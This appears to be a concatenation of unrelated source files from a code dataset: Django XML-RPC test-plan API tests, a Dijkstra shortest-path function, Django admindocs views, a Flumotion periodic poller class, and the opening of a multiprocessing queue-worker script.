        self.assertXmlrpcFaultBadRequest(XmlrpcTestPlan.check_plan_type, self.http_req)
        result = XmlrpcTestPlan.check_plan_type(self.http_req, self.plan_type.name)
        self.assertEqual(self.plan_type.name, result["name"])
        self.assertEqual(self.plan_type.description, result["description"])
        self.assertEqual(self.plan_type.pk, result["id"])
    def test_get_plan_type(self):
        """get_plan_type looks a type up by pk; unknown pks raise NotFound."""
        result = XmlrpcTestPlan.get_plan_type(self.http_req, self.plan_type.pk)
        self.assertEqual(self.plan_type.name, result["name"])
        self.assertEqual(self.plan_type.description, result["description"])
        self.assertEqual(self.plan_type.pk, result["id"])
        self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_plan_type, self.http_req, 0)
        self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_plan_type, self.http_req, -2)
class TestGetProduct(XmlrpcAPIBaseTest):
    """Test TestPlan.get_product"""
    @classmethod
    def setUpTestData(cls):
        cls.http_req = make_http_request()
        cls.user = f.UserFactory()
        cls.product = f.ProductFactory()
        cls.plan = f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product)
    def _verify_serialize_result(self, result):
        """Assert the serialized product matches the plan's product fields."""
        self.assertEqual(self.plan.product.name, result["name"])
        self.assertEqual(self.plan.product.description, result["description"])
        self.assertEqual(self.plan.product.disallow_new, result["disallow_new"])
        self.assertEqual(self.plan.product.vote_super_user, result["vote_super_user"])
        self.assertEqual(self.plan.product.max_vote_super_bug, result["max_vote_super_bug"])
        self.assertEqual(self.plan.product.votes_to_confirm, result["votes_to_confirm"])
        self.assertEqual(self.plan.product.default_milestone, result["default_milestone"])
        self.assertEqual(self.plan.product.classification.pk, result["classification_id"])
        self.assertEqual(self.plan.product.classification.name, result["classification"])
    def test_get_product(self):
        """The plan id may be given as str or int; non-numeric input faults."""
        # self.assertXmlrpcFaultNotFound(
        #     XmlrpcTestPlan.get_product, self.http_req, 0)
        result = XmlrpcTestPlan.get_product(self.http_req, str(self.plan.pk))
        self._verify_serialize_result(result)
        result = XmlrpcTestPlan.get_product(self.http_req, self.plan.pk)
        self._verify_serialize_result(result)
        self.assertXmlrpcFaultBadRequest(XmlrpcTestPlan.get_product, self.http_req, "plan_id")
# Placeholder suites, skipped until the corresponding API tests are written.
@unittest.skip("TODO: test case is not implemented yet.")
class TestComponentMethods(test.TestCase):
    """TODO:"""
@unittest.skip("TODO: test case is not implemented yet.")
class TestGetAllCasesTags(test.TestCase):
    """TODO:"""
class TestGetTestCases(XmlrpcAPIBaseTest):
    """Test testplan.get_test_cases method"""
    @classmethod
    def setUpTestData(cls):
        cls.http_req = make_http_request()
        cls.tester = f.UserFactory(username="tester")
        cls.reviewer = f.UserFactory(username="reviewer")
        cls.product = f.ProductFactory()
        cls.plan = f.TestPlanFactory(author=cls.tester, owner=cls.tester, product=cls.product)
        cls.cases = [
            f.TestCaseFactory(
                author=cls.tester,
                default_tester=None,
                reviewer=cls.reviewer,
                plan=[cls.plan],
            ),
            f.TestCaseFactory(
                author=cls.tester,
                default_tester=None,
                reviewer=cls.reviewer,
                plan=[cls.plan],
            ),
            f.TestCaseFactory(
                author=cls.tester,
                default_tester=None,
                reviewer=cls.reviewer,
                plan=[cls.plan],
            ),
        ]
        # A plan with no cases, for the empty-result test below.
        cls.another_plan = f.TestPlanFactory(
            author=cls.tester, owner=cls.tester, product=cls.product
        )
    def test_get_test_cases(self):
        """Each serialized case matches its DB row, including the per-plan sortkey."""
        serialized_cases = XmlrpcTestPlan.get_test_cases(self.http_req, self.plan.pk)
        for case in serialized_cases:
            expected_case = TestCase.objects.filter(plan=self.plan.pk).get(pk=case["case_id"])
            self.assertEqual(expected_case.summary, case["summary"])
            self.assertEqual(expected_case.priority_id, case["priority_id"])
            self.assertEqual(expected_case.author_id, case["author_id"])
            plan_case_rel = TestCasePlan.objects.get(plan=self.plan, case=case["case_id"])
            self.assertEqual(plan_case_rel.sortkey, case["sortkey"])
    @unittest.skip("TODO: fix get_test_cases to make this test pass.")
    def test_different_argument_type(self):
        """A string plan id should be rejected with a BadRequest fault."""
        self.assertXmlrpcFaultBadRequest(
            XmlrpcTestPlan.get_test_cases, self.http_req, str(self.plan.pk)
        )
    def test_404_when_plan_nonexistent(self):
        """Unknown plan ids raise a NotFound fault."""
        self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_test_cases, self.http_req, 0)
        plan_id = TestPlan.objects.order_by("-pk")[:1][0].pk + 1
        self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_test_cases, self.http_req, plan_id)
    def test_plan_has_no_cases(self):
        """A plan with no cases serializes to an empty list, not a fault."""
        result = XmlrpcTestPlan.get_test_cases(self.http_req, self.another_plan.pk)
        self.assertEqual([], result)
# Placeholder suites, skipped until the corresponding API tests are written.
@unittest.skip("TODO: test case is not implemented yet.")
class TestGetTestRuns(test.TestCase):
    """TODO:"""
@unittest.skip("TODO: test case is not implemented yet.")
class TestGetText(test.TestCase):
    """TODO:"""
@unittest.skip("TODO: test case is not implemented yet.")
class TestRemoveTag(test.TestCase):
    """TODO:"""
class TestUpdate(test.TestCase):
    """Tests the XMLRPC testplan.update method"""
    @classmethod
    def setUpTestData(cls):
        cls.user = f.UserFactory()
        cls.http_req = make_http_request(user=cls.user, user_perm="testplans.change_testplan")
        cls.env_group_1 = f.TCMSEnvGroupFactory()
        cls.env_group_2 = f.TCMSEnvGroupFactory()
        cls.product = f.ProductFactory()
        cls.version = f.VersionFactory(product=cls.product)
        cls.tester = f.UserFactory()
        cls.plan_type = f.TestPlanTypeFactory(name="manual smoking")
        # Both plans start out attached to env_group_1.
        cls.plan_1 = f.TestPlanFactory(
            product_version=cls.version,
            product=cls.product,
            author=cls.tester,
            type=cls.plan_type,
            env_group=(cls.env_group_1,),
        )
        cls.plan_2 = f.TestPlanFactory(
            product_version=cls.version,
            product=cls.product,
            author=cls.tester,
            type=cls.plan_type,
            env_group=(cls.env_group_1,),
        )
    def test_update_env_group(self):
        """Updating one plan's env_group must not affect the other plan nor
        leave dangling rows in the many-to-many table."""
        # plan_1 and plan_2 point to self.env_group_1
        # and there are only 2 objects in the many-to-many table
        # so we issue XMLRPC request to modify the env_group of self.plan_2
        plans = XmlrpcTestPlan.update(
            self.http_req, self.plan_2.pk, {"env_group": self.env_group_2.pk}
        )
        plan = plans[0]
        # now verify that the returned TP (plan_2) has been updated to env_group_2
        self.assertEqual(self.plan_2.pk, plan["plan_id"])
        self.assertEqual(1, len(plan["env_group"]))
        self.assertEqual(self.env_group_2.pk, plan["env_group"][0])
        # and that plan_1 has not changed at all
        self.assertEqual(1, self.plan_1.env_group.count())
        self.assertEqual(self.env_group_1.pk, self.plan_1.env_group.all()[0].pk)
        # and there are still only 2 objects in the many-to-many table
        # iow no dangling objects left
        self.assertEqual(
            2,
            TCMSEnvPlanMap.objects.filter(plan__in=[self.plan_1, self.plan_2]).count(),
        )
class TestImportCaseViaXML(XmlrpcAPIBaseTest):
    """Test import_case_via_XML"""
    @classmethod
    def setUpTestData(cls):
        cls.author = f.UserFactory(username="user", email="user@example.com")
        cls.plan = f.TestPlanFactory(author=cls.author, owner=cls.author)
        cls.http_req = make_http_request(user=cls.author)
    def test_succeed_to_import_cases(self):
        """A well-formed XML document imports all its cases into the plan."""
        result = import_case_via_XML(self.http_req, self.plan.pk, xml_file_without_error)
        self.assertEqual(2, TestCase.objects.count())
        self.assertTrue(TestCase.objects.filter(summary="case 2").exists())
        self.assertEqual("Success update 2 cases", result)
class TestGet(test.TestCase):
    """Test TestPlan.get"""
    @classmethod
    def setUpTestData(cls):
        cls.author = f.UserFactory(username="user", email="user@example.com")
        cls.http_req = make_http_request(user=cls.author)
        cls.product = f.ProductFactory()
        cls.version = f.VersionFactory(product=cls.product)
        cls.type = f.TestPlanTypeFactory(name="temp")
        cls.tag_fedora = f.TestTagFactory(name="fedora")
        cls.tag_centos = f.TestTagFactory(name="centos")
        cls.plan = f.TestPlanFactory(
            is_active=True,
            extra_link=None,
            product=cls.product,
            product_version=cls.version,
            owner=cls.author,
            author=cls.author,
            parent=None,
            type=cls.type,
            tag=[cls.tag_fedora, cls.tag_centos],
        )
    def test_get(self):
        """The serialized plan must contain every documented field verbatim."""
        self.maxDiff = None
        expected_plan = {
            "plan_id": self.plan.pk,
            "name": self.plan.name,
            "create_date": datetime_to_str(self.plan.create_date),
            "is_active": True,
            "extra_link": None,
            "product_version_id": self.version.pk,
            "product_version": self.version.value,
            "default_product_version": self.version.value,
            "owner_id": self.author.pk,
            "owner": self.author.username,
            "author_id": self.author.pk,
            "author": self.author.username,
            "product_id": self.product.pk,
            "product": self.product.name,
            "type_id": self.type.pk,
            "type": self.type.name,
            "parent_id": None,
            "parent": None,
            "attachments": [],
            "component": [],
            "env_group": [],
            "tag": ["centos", "fedora"],
        }
        plan = XmlrpcTestPlan.get(self.http_req, self.plan.pk)
        # tag order from the API is unspecified; sort before comparing
        plan["tag"].sort()
        self.assertEqual(expected_plan, plan)
class TestCreatePlan(XmlrpcAPIBaseTest):
    """Test API create"""
    @classmethod
    def setUpTestData(cls):
        cls.author = f.UserFactory(username="user", email="user@example.com")
        cls.http_req = make_http_request(user=cls.author, user_perm="testplans.add_testplan")
        cls.product = f.ProductFactory()
        cls.version = f.VersionFactory(product=cls.product)
        cls.type = TestPlanType.objects.first()
    def test_create_a_plan(self):
        """create() persists the plan (with email settings and text) and
        returns the serialized form of the new plan."""
        plan_doc = "<h1>Main Plan</h1>"
        plan = XmlrpcTestPlan.create(
            self.http_req,
            {
                "name": "Test xmlrpc plan create API",
                "product": self.product.pk,
                "product_version": self.version.pk,
                "type": self.type.pk,
                "text": plan_doc,
            },
        )
        created_plan = TestPlan.objects.first()
        self.assertIsNotNone(created_plan.email_settings)
        self.assertEqual(created_plan.pk, plan["plan_id"])
        self.assertEqual(created_plan.product.pk, plan["product_id"])
        self.assertEqual(created_plan.product_version.pk, plan["product_version_id"])
        self.assertEqual(created_plan.type.pk, plan["type_id"])
        self.assertEqual(created_plan.text.first().plan_text, plan_doc)
    def test_missing_product(self):
        """Omitting the mandatory product key raises a BadRequest fault."""
        self.assertXmlrpcFaultBadRequest(
            XmlrpcTestPlan.create,
            self.http_req,
            {
                "name": "Test xmlrpc plan create API",
                "product_version": self.version.pk,
                "type": self.type.pk,
                "text": "plan text",
            },
        )
| gpl-2.0 |
def Dijkstra(G, start, end=None):
    """Single-source shortest paths (Dijkstra) over a dict-of-dicts graph.

    G is a dictionary indexed by vertices; for any edge v->w, G[v][w] is
    the length of the edge.  Returns a pair (D, P) where D[v] is the
    distance from ``start`` to v and P[v] is the predecessor of v along
    the shortest path from ``start`` to v.  If ``end`` is given, the
    search stops as soon as ``end`` is finalized, so D covers only
    vertices no farther than ``end``.

    Edge lengths must be non-negative; a ValueError is raised if a
    negative edge is discovered to have produced a wrong answer for an
    already-finalized vertex.
    """
    # BUG FIX: the original called priorityDictionary(), a name that is
    # neither defined nor imported in this module (guaranteed NameError).
    # This version uses the standard-library binary heap with lazy
    # deletion of stale entries instead.
    import heapq
    D = {}                  # final shortest distances
    P = {}                  # predecessor on the shortest path
    seen = {start: 0}       # best tentative distance per vertex
    heap = [(0, start)]     # (distance, vertex) entries; may hold stale ones
    while heap:
        dist, v = heapq.heappop(heap)
        if v in D:
            continue        # stale entry: v was already finalized
        D[v] = dist
        if v == end:
            break
        for w in G[v]:
            vwLength = dist + G[v][w]
            if w in D:
                if vwLength < D[w]:
                    raise ValueError("Dijkstra: found better path to already-final vertex")
            elif w not in seen or vwLength < seen[w]:
                seen[w] = vwLength
                P[w] = v
                heapq.heappush(heap, (vwLength, w))
    return (D, P)
def shortestPath(G, start, end):
    """
    Find a single shortest path from the given start vertex to the given
    end vertex. The input has the same conventions as Dijkstra(). The
    output is a list of the vertices in order along the shortest path.
    """
    # Distances are computed but only the predecessor map is needed to
    # reconstruct the route.
    distances, predecessors = Dijkstra(G, start, end)
    # Walk backwards from the end vertex following predecessor links.
    route = [end]
    while route[-1] != start:
        route.append(predecessors[route[-1]])
    route.reverse()
    return route
# Example graph from CLR p.528: a directed, weighted graph represented as a
# dict of dicts (G[v][w] is the length of edge v->w).
G = {'s': {'u':10, 'x':5},
     'u': {'v':1, 'x':2},
     'v': {'y':4},
     'x':{'u':3,'v':9,'y':2},
     'y':{'s':7,'v':6}}
# Dijkstra is called here without an explicit end vertex, so it computes
# distances and predecessors for every vertex reachable from 's'.
print(Dijkstra(G,'s'))
print(shortestPath(G,'s','v'))
| apache-2.0 |
aparo/django-nonrel | django/contrib/admindocs/views.py | 14 | 15302 | from django import template, templatetags
from django.template import RequestContext
from django.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
from django.db import models
from django.shortcuts import render_to_response
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import Http404
from django.core import urlresolvers
from django.contrib.admindocs import utils
from django.contrib.sites.models import Site
from django.utils.importlib import import_module
from django.utils.translation import ugettext as _
from django.utils.safestring import mark_safe
import inspect, os, re
# Exclude methods starting with these strings from documentation
MODEL_METHODS_EXCLUDE = ('_', 'add_', 'delete', 'save', 'set_')
class GenericSite(object):
    """Minimal stand-in for a Site object, used when the
    django.contrib.sites framework is not installed."""
    domain = 'example.com'
    name = 'my site'
def get_root_path():
    """Return the URL prefix of the admin site, trying progressively older
    lookup styles and falling back to settings.ADMIN_SITE_ROOT_URL."""
    try:
        # Named-URL style ('admin' namespace).
        return urlresolvers.reverse('admin:index')
    except urlresolvers.NoReverseMatch:
        from django.contrib import admin
        try:
            # Older style: reverse by the admin site's root view callable.
            return urlresolvers.reverse(admin.site.root, args=[''])
        except urlresolvers.NoReverseMatch:
            # Last resort: the explicit setting, defaulting to /admin/.
            return getattr(settings, "ADMIN_SITE_ROOT_URL", "/admin/")
def doc_index(request):
    """Render the admindocs landing page (requires docutils)."""
    if not utils.docutils_is_available:
        return missing_docutils_page(request)
    return render_to_response('admin_doc/index.html', {
        'root_path': get_root_path(),
    }, context_instance=RequestContext(request))
# Restrict to staff users (decorator applied py2.3-style, no @ syntax).
doc_index = staff_member_required(doc_index)
def bookmarklets(request):
    """Render the page listing the admindocs bookmarklets."""
    admin_root = get_root_path()
    return render_to_response('admin_doc/bookmarklets.html', {
        'root_path': admin_root,
        # Absolute admin URL, matching the scheme of the current request.
        'admin_url': mark_safe("%s://%s%s" % (request.is_secure() and 'https' or 'http', request.get_host(), admin_root)),
    }, context_instance=RequestContext(request))
bookmarklets = staff_member_required(bookmarklets)
def template_tag_index(request):
    """List every registered template tag, with its docstring rendered
    through reST (requires docutils)."""
    if not utils.docutils_is_available:
        return missing_docutils_page(request)

    load_all_installed_template_libraries()

    tags = []
    for module_name, library in template.libraries.items():
        for tag_name, tag_func in library.tags.items():
            # Split the tag's docstring into summary / body / metadata.
            title, body, metadata = utils.parse_docstring(tag_func.__doc__)
            if title:
                title = utils.parse_rst(title, 'tag', _('tag:') + tag_name)
            if body:
                body = utils.parse_rst(body, 'tag', _('tag:') + tag_name)
            for key in metadata:
                metadata[key] = utils.parse_rst(metadata[key], 'tag', _('tag:') + tag_name)
            # Built-in libraries have no {% load %}-able name.
            if library in template.builtins:
                tag_library = None
            else:
                tag_library = module_name.split('.')[-1]
            tags.append({
                'name': tag_name,
                'title': title,
                'body': body,
                'meta': metadata,
                'library': tag_library,
            })
    return render_to_response('admin_doc/template_tag_index.html', {
        'root_path': get_root_path(),
        'tags': tags
    }, context_instance=RequestContext(request))
template_tag_index = staff_member_required(template_tag_index)
def template_filter_index(request):
    """List every registered template filter, with its docstring rendered
    through reST (requires docutils). Mirrors template_tag_index."""
    if not utils.docutils_is_available:
        return missing_docutils_page(request)

    load_all_installed_template_libraries()

    filters = []
    for module_name, library in template.libraries.items():
        for filter_name, filter_func in library.filters.items():
            # Split the filter's docstring into summary / body / metadata.
            title, body, metadata = utils.parse_docstring(filter_func.__doc__)
            if title:
                title = utils.parse_rst(title, 'filter', _('filter:') + filter_name)
            if body:
                body = utils.parse_rst(body, 'filter', _('filter:') + filter_name)
            for key in metadata:
                metadata[key] = utils.parse_rst(metadata[key], 'filter', _('filter:') + filter_name)
            # Built-in libraries have no {% load %}-able name.
            if library in template.builtins:
                tag_library = None
            else:
                tag_library = module_name.split('.')[-1]
            filters.append({
                'name': filter_name,
                'title': title,
                'body': body,
                'meta': metadata,
                'library': tag_library,
            })
    return render_to_response('admin_doc/template_filter_index.html', {
        'root_path': get_root_path(),
        'filters': filters
    }, context_instance=RequestContext(request))
template_filter_index = staff_member_required(template_filter_index)
def view_index(request):
    """List all views reachable from the URLconfs of the sites listed in
    settings.ADMIN_FOR (or from the current settings when it is empty)."""
    if not utils.docutils_is_available:
        return missing_docutils_page(request)

    if settings.ADMIN_FOR:
        settings_modules = [import_module(m) for m in settings.ADMIN_FOR]
    else:
        settings_modules = [settings]

    views = []
    for settings_mod in settings_modules:
        urlconf = import_module(settings_mod.ROOT_URLCONF)
        view_functions = extract_views_from_urlpatterns(urlconf.urlpatterns)
        # Fall back to a placeholder when the sites framework isn't installed.
        if Site._meta.installed:
            site_obj = Site.objects.get(pk=settings_mod.SITE_ID)
        else:
            site_obj = GenericSite()
        for (func, regex) in view_functions:
            views.append({
                # Class-based views have no __name__; use the class name.
                'name': getattr(func, '__name__', func.__class__.__name__),
                'module': func.__module__,
                'site_id': settings_mod.SITE_ID,
                'site': site_obj,
                'url': simplify_regex(regex),
            })
    return render_to_response('admin_doc/view_index.html', {
        'root_path': get_root_path(),
        'views': views
    }, context_instance=RequestContext(request))
view_index = staff_member_required(view_index)
def view_detail(request, view):
    """Show the parsed docstring of a single view, looked up by its dotted
    path ("package.module.func")."""
    if not utils.docutils_is_available:
        return missing_docutils_page(request)

    mod, func = urlresolvers.get_mod_func(view)
    try:
        view_func = getattr(import_module(mod), func)
    except (ImportError, AttributeError):
        raise Http404
    title, body, metadata = utils.parse_docstring(view_func.__doc__)
    if title:
        title = utils.parse_rst(title, 'view', _('view:') + view)
    if body:
        body = utils.parse_rst(body, 'view', _('view:') + view)
    for key in metadata:
        # NOTE(review): the 'model' context type looks like it should be
        # 'view' here, but this matches the code as written -- confirm
        # upstream before changing.
        metadata[key] = utils.parse_rst(metadata[key], 'model', _('view:') + view)
    return render_to_response('admin_doc/view_detail.html', {
        'root_path': get_root_path(),
        'name': view,
        'summary': title,
        'body': body,
        'meta': metadata,
    }, context_instance=RequestContext(request))
view_detail = staff_member_required(view_detail)
def model_index(request):
    """List the _meta of every installed model (requires docutils)."""
    if not utils.docutils_is_available:
        return missing_docutils_page(request)
    m_list = [m._meta for m in models.get_models()]
    return render_to_response('admin_doc/model_index.html', {
        'root_path': get_root_path(),
        'models': m_list
    }, context_instance=RequestContext(request))
model_index = staff_member_required(model_index)
def model_detail(request, app_label, model_name):
    """Display every field, no-argument method, and related-object accessor
    of a single model.

    ``model_name`` is matched case-insensitively against the models of
    ``app_label``. Raises Http404 if the app or the model cannot be found.
    """
    if not utils.docutils_is_available:
        return missing_docutils_page(request)

    # Get the model class.
    try:
        app_mod = models.get_app(app_label)
    except ImproperlyConfigured:
        raise Http404(_("App %r not found") % app_label)
    model = None
    for m in models.get_models(app_mod):
        if m._meta.object_name.lower() == model_name:
            model = m
            break
    if model is None:
        raise Http404(_("Model %(model_name)r not found in app %(app_label)r") % {'model_name': model_name, 'app_label': app_label})

    opts = model._meta

    # Gather fields/field descriptions.
    fields = []
    for field in opts.fields:
        # ForeignKey is a special case since the field will actually be a
        # descriptor that returns the other object.
        if isinstance(field, models.ForeignKey):
            data_type = related_object_name = field.rel.to.__name__
            # Use a distinct local name: the original code clobbered the
            # app_label *argument* here.
            related_app_label = field.rel.to._meta.app_label
            verbose = utils.parse_rst((_("the related `%(app_label)s.%(data_type)s` object") % {'app_label': related_app_label, 'data_type': data_type}), 'model', _('model:') + data_type)
        else:
            data_type = get_readable_field_data_type(field)
            verbose = field.verbose_name
        fields.append({
            'name': field.name,
            'data_type': data_type,
            'verbose': verbose,
            'help_text': field.help_text,
        })

    # Gather many-to-many fields: each contributes a .all and a .count entry.
    for field in opts.many_to_many:
        data_type = related_object_name = field.rel.to.__name__
        related_app_label = field.rel.to._meta.app_label
        verbose = _("related `%(app_label)s.%(object_name)s` objects") % {'app_label': related_app_label, 'object_name': data_type}
        fields.append({
            'name': "%s.all" % field.name,
            'data_type': 'List',
            'verbose': utils.parse_rst(_("all %s") % verbose, 'model', _('model:') + opts.module_name),
        })
        fields.append({
            'name': "%s.count" % field.name,
            'data_type': 'Integer',
            'verbose': utils.parse_rst(_("number of %s") % verbose, 'model', _('model:') + opts.module_name),
        })

    # Gather model methods: public instance methods taking only self.
    for func_name, func in model.__dict__.items():
        if inspect.isfunction(func) and len(inspect.getargspec(func)[0]) == 1:
            # Skip excluded prefixes. (The original emulated this with a
            # raise StopIteration / except StopIteration dance.)
            if any(func_name.startswith(exclude) for exclude in MODEL_METHODS_EXCLUDE):
                continue
            verbose = func.__doc__
            if verbose:
                verbose = utils.parse_rst(utils.trim_docstring(verbose), 'model', _('model:') + opts.module_name)
            fields.append({
                'name': func_name,
                'data_type': get_return_data_type(func_name),
                'verbose': verbose,
            })

    # Gather related objects (reverse FK and reverse M2M accessors).
    for rel in opts.get_all_related_objects() + opts.get_all_related_many_to_many_objects():
        verbose = _("related `%(app_label)s.%(object_name)s` objects") % {'app_label': rel.opts.app_label, 'object_name': rel.opts.object_name}
        accessor = rel.get_accessor_name()
        fields.append({
            'name': "%s.all" % accessor,
            'data_type': 'List',
            'verbose': utils.parse_rst(_("all %s") % verbose, 'model', _('model:') + opts.module_name),
        })
        fields.append({
            'name': "%s.count" % accessor,
            'data_type': 'Integer',
            'verbose': utils.parse_rst(_("number of %s") % verbose, 'model', _('model:') + opts.module_name),
        })
    return render_to_response('admin_doc/model_detail.html', {
        'root_path': get_root_path(),
        'name': '%s.%s' % (opts.app_label, opts.object_name),
        'summary': _("Fields on %s objects") % opts.object_name,
        'description': model.__doc__,
        'fields': fields,
    }, context_instance=RequestContext(request))
model_detail = staff_member_required(model_detail)
def _read_template_or_empty(path):
    """Return the contents of *path*, or '' if it does not exist.

    Also closes the file handle, unlike the previous bare open().read().
    """
    if not os.path.exists(path):
        return ''
    template_file = open(path)
    try:
        return template_file.read()
    finally:
        template_file.close()

def template_detail(request, template):
    """Show every candidate location of *template* across the template
    directories of each site listed in settings.ADMIN_FOR."""
    templates = []
    for site_settings_module in settings.ADMIN_FOR:
        settings_mod = import_module(site_settings_module)
        if Site._meta.installed:
            site_obj = Site.objects.get(pk=settings_mod.SITE_ID)
        else:
            site_obj = GenericSite()
        for dir in settings_mod.TEMPLATE_DIRS:
            template_file = os.path.join(dir, template)
            templates.append({
                'file': template_file,
                'exists': os.path.exists(template_file),
                # Bind the current path as a default argument. The original
                # bare closure late-bound template_file, so every row showed
                # the contents of the *last* template directory's file.
                'contents': lambda path=template_file: _read_template_or_empty(path),
                'site_id': settings_mod.SITE_ID,
                'site': site_obj,
                'order': list(settings_mod.TEMPLATE_DIRS).index(dir),
            })
    return render_to_response('admin_doc/template_detail.html', {
        'root_path': get_root_path(),
        'name': template,
        'templates': templates,
    }, context_instance=RequestContext(request))
template_detail = staff_member_required(template_detail)
####################
# Helper functions #
####################
def missing_docutils_page(request):
    """Display an error message for people without docutils"""
    # Static template; no RequestContext needed.
    return render_to_response('admin_doc/missing_docutils.html')
def load_all_installed_template_libraries():
    # Load/register all template tag libraries from installed apps.
    for module_name in template.get_templatetags_modules():
        mod = import_module(module_name)
        # Candidate libraries: every .py module in the templatetags package
        # whose filename starts with a letter.
        libraries = [
            os.path.splitext(p)[0]
            for p in os.listdir(os.path.dirname(mod.__file__))
            if p.endswith('.py') and p[0].isalpha()
        ]
        for library_name in libraries:
            try:
                lib = template.get_library(library_name)
            except template.InvalidTemplateLibrary, e:
                # Broken libraries are deliberately skipped; their tags and
                # filters simply won't appear in the index pages.
                pass
def get_return_data_type(func_name):
    """Return a somewhat-helpful data type given a function name"""
    # Only "get_*" accessors carry a guessable return type.
    if not func_name.startswith('get_'):
        return ''
    if func_name.endswith('_list'):
        return 'List'
    if func_name.endswith('_count'):
        return 'Integer'
    return ''
def get_readable_field_data_type(field):
    """Returns the description for a given field type, if it exists.

    Fields' descriptions can contain %-style format placeholders, which are
    interpolated against the values of field.__dict__ before being output.
    """
    description = field.description
    return description % field.__dict__
def extract_views_from_urlpatterns(urlpatterns, base=''):
    """
    Return a list of views from a list of urlpatterns.

    Each object in the returned list is a two-tuple: (view_func, regex)
    """
    views = []
    for p in urlpatterns:
        if hasattr(p, '_get_callback'):
            # A URL pattern: resolve its view callback.
            try:
                views.append((p._get_callback(), base + p.regex.pattern))
            except ViewDoesNotExist:
                continue
        elif hasattr(p, '_get_url_patterns'):
            # A URL resolver: recurse into the included URLconf, prefixing
            # the accumulated regex so far.
            try:
                patterns = p.url_patterns
            except ImportError:
                continue
            views.extend(extract_views_from_urlpatterns(patterns, base + p.regex.pattern))
        else:
            raise TypeError(_("%s does not appear to be a urlpattern object") % p)
    return views
# Matches a named group "(?P<name>...)" and captures just "<name>".
named_group_matcher = re.compile(r'\(\?P(<\w+>).+?\)')
# Matches any remaining (unnamed) group.
non_named_group_matcher = re.compile(r'\(.*?\)')

def simplify_regex(pattern):
    """
    Clean up urlpattern regexes into something somewhat readable by Mere Humans:
    turns something like "^(?P<sport_slug>\w+)/athletes/(?P<athlete_slug>\w+)/$"
    into "<sport_slug>/athletes/<athlete_slug>/"
    """
    # Named groups first: keep just the "<name>" part.
    pattern = named_group_matcher.sub(lambda match: match.group(1), pattern)
    # Remaining (unnamed) groups become a generic placeholder.
    pattern = non_named_group_matcher.sub("<var>", pattern)
    # Strip leftover regex metacharacters, in the same order as before.
    for old, new in (('^', ''), ('$', ''), ('?', ''), ('//', '/'), ('\\', '')):
        pattern = pattern.replace(old, new)
    if not pattern.startswith('/'):
        pattern = '/' + pattern
    return pattern
| bsd-3-clause |
flyapen/UgFlu | flumotion/common/poller.py | 2 | 4013 | # -*- Mode: Python; test-case-name: flumotion.test.test_common -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# Flumotion - a streaming media server
# Copyright (C) 2004,2005,2006,2007,2008 Fluendo, S.L. (www.fluendo.com).
# All rights reserved.
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
# Licensees having purchased or holding a valid Flumotion Advanced
# Streaming Server license may use this file in accordance with the
# Flumotion Advanced Streaming Server Commercial License Agreement.
# See "LICENSE.Flumotion" in the source distribution for more information.
# Headers in this file shall remain intact.
"""cancellable, periodic call to a procedure
"""
from twisted.internet import reactor
from twisted.internet.defer import maybeDeferred
from flumotion.common import log
__version__ = "$Rev: 7162 $"
class Poller(object, log.Loggable):
    """A class representing a cancellable, periodic call to a procedure,
    which is robust in the face of exceptions raised by the procedure.

    The poller will wait for a specified number of seconds between
    calls. The time taken for the procedure to complete is not counted
    in the timeout. If the procedure returns a deferred, rescheduling
    will be performed after the deferred fires.

    For example, if the timeout is 10 seconds and the procedure returns
    a deferred which fires 5 seconds later, the next invocation of the
    procedure will be performed 15 seconds after the previous
    invocation.
    """

    def __init__(self, proc, timeout, immediately=False, start=True):
        """
        @param proc: a procedure of no arguments
        @param timeout: float number of seconds to wait between calls
        @param immediately: whether to immediately call proc, or to wait
                            until one period has passed
        @param start: whether to start the poller (defaults to True)
        """
        self.proc = proc
        # Used by log.Loggable to tag log lines from this poller.
        self.logName = 'poller-%s' % proc.__name__
        self.timeout = timeout

        # The pending reactor.callLater handle, or None when no call is
        # currently scheduled.
        self._dc = None
        self.running = False

        if start:
            self.start(immediately)

    def start(self, immediately=False):
        """Start the poller.

        This procedure is called during __init__, so it is normally not
        necessary to call it. It will ensure that the poller is running,
        even after a previous call to stop().

        @param immediately: whether to immediately invoke the poller, or
                            to wait until one period has passed
        """
        if self.running:
            self.debug('already running')
        else:
            self.running = True
            self._reschedule(immediately)

    def _reschedule(self, immediately=False):
        # A delayed call must never already be pending when scheduling a new
        # one, otherwise invocations would pile up.
        assert self._dc is None
        if self.running:
            if immediately:
                self.run()
            else:
                self._dc = reactor.callLater(self.timeout, self.run)
        else:
            self.debug('shutting down, not rescheduling')

    def run(self):
        """Run the poller immediately, regardless of when it was last
        run.
        """

        def reschedule(v):
            # addBoth callback: reschedule after proc completes, passing the
            # result (or failure) through unchanged.
            self._reschedule()
            return v

        if self._dc and self._dc.active():
            # we don't get here in the normal periodic case, only for
            # explicit run() invocations
            self._dc.cancel()
        # Clear the handle unconditionally so _reschedule's assert holds.
        self._dc = None

        # maybeDeferred makes this robust whether proc returns a value,
        # returns a deferred, or raises synchronously.
        d = maybeDeferred(self.proc)
        d.addBoth(reschedule)

    def stop(self):
        """Stop the poller.

        This procedure ensures that the poller is stopped. It may be
        called multiple times.
        """
        if self._dc:
            self._dc.cancel()
            self._dc = None
        self.running = False
| gpl-2.0 |
baixuexue123/note | python/concurrency/process_threads.py | 1 | 2227 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import threading
import multiprocessing
import datetime
import time
class WriteFileWorker(multiprocessing.Process):
    """Daemon process that drains a queue and prints each item.

    The string 'cmd:quit' is used as an in-band sentinel to stop the loop.
    """

    def __init__(self, queue, name=None):
        super(WriteFileWorker, self).__init__(name=name)
        # Daemonize so the worker never outlives the parent process.
        self.daemon = 1
        self._queue = queue

    def run(self):
        print('WriteFileWorker start ...')
        while 1:
            content = self._queue.get()
            # Sentinel value: stop consuming.
            if content == 'cmd:quit':
                break
            print(self.name + ' : ' + str(content))
